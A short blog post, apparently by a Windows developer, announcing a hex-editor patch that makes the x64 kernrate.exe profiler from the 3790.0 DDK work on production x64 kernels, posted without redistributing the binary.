If you find yourself in a similar bind, and need a working kernrate for x64 (until if and when Microsoft puts out a new version that is compatible with production x64 kernels), I’ve posted the patch (assembler, with opcode diffs) that I made to the “amd64” release of kernrate.exe from the 3790.0 DDK. Any conventional hex editor should be sufficient to apply it (as far as I know, third parties aren’t authorized to redistribute kernrate in its entirety, so I’m not posting the entire binary). Note that DDKs after the 3790.0 DDK don’t include any kernrate for x64 (even the prerelease version, broken as it was), so you’ll also need the original 3790.0 DDK to use the patch. Hopefully, we may see an update to kernrate at some point, but for now, the patch suffices in a pinch if you really need to profile a Windows x64 system.